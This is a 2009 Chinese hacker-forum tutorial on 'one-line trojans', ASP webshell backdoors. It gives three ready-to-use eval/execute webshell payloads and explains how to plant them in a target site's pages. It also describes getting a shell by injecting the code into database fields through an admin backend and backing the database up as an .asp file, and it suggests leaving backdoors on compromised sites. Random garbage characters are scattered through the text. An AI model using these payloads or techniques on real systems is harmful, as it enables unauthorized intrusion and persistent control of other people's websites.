【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [原创教程] 一句话木马的使用方法视频 [打印本页]

作者: oooooo 时间: 2009-7-3 09:19 标题: 一句话木马的使用方法视频

一句话木马的使用
- h, l5 v, R$ R, t% ^7 [
by:柔肠寸断 790653916  www.3ast.com.cn  不免费收点徒弟~~~- e6 c. D- t8 x. @. B; X2 `
. z) V  C+ L" i) Z

1、咱们先弄懂怎么使用的。; b- c* q" R- e$ B' j' B
* Z* G1 D* i5 M9 L. G3 }
分为客户端和服务端

客户端是连接上去的程序，也可以是网页4 n) U$ y) j8 t* a
; W' z: R" b2 U/ @0 z+ Z# m1 G' C
http://www.3ast.com.cn/tool/yijuhua.html

服务端就是一段代码，代码里有对应的“密码”/ ]: I, n, L7 Q7 R/ @0 L% c7 L; a
! }6 v. v: e3 f6 y1 U' V
提供三个服务端:
1. <%eval request("cnnsc")%>
2. <%execute request("cnnsc")%> ' N5 ~) B9 F6 V4 Z4 W
3. <%execute(request("cnnsc"))%>

cnnsc--密码* |' i4 b5 q& m6 Q) d
1 N" j9 q8 J# x
我们只要把这个代码插入到对方网站的网页中就可以了# ]! i0 L1 C/ `9 [! }
3 T1 `& B' U$ D6 o" J' _+ k+ ]7 q
我演示下，用已经有的一个webshell添加一个asp文件，加上 <%eval request("cnnsc")%>
0 s. U+ l; T" m$ S5 m. R
换一个页面，添加过了。访问的时候一切正常，看链接2 V% w; }4 t5 z& Z

上传之后
  E4 h1 u7 O$ a6 _1 V# j. }) S
链接上去了; g. H& p9 D% D$ l& g
OK.这个就是链接的主要过程; S9 |9 r' v( u* s6 G% [  q
0 p; U/ ~5 z9 k; h
7 b9 H3 m9 i* }' }3 r, R+ d

2、然后懂得哪里会用上、怎么用
3 j( P; H0 h* w* V
(1)有的时候我们进入了XXX的后台，后台有备份数据库，那么我们就可以在系统中插入这个一句话代码，任意地方，比如皮肤名称啊，文章标题啊，只要是会被写进数据库的就可以了，然后备份数据库成一个asp文件（也有php的一句话），然后链接就可以拿下来了; _# E. h9 ]. R" W! C4 P
5 ^0 T0 ^/ s( {; j* J
(2)可以给自己入侵的网站留下后门。。。。# M1 p2 g' I4 o% o8 a

(3)我再想想。。。哎，想不出，还是要自己多多实践。。。。( R7 E8 x) v/ G0 ?1 \

好了，教程到此结束，不懂的可以再来问我。。。790653916

作者: EndTo偌枫 时间: 2009-7-3 13:27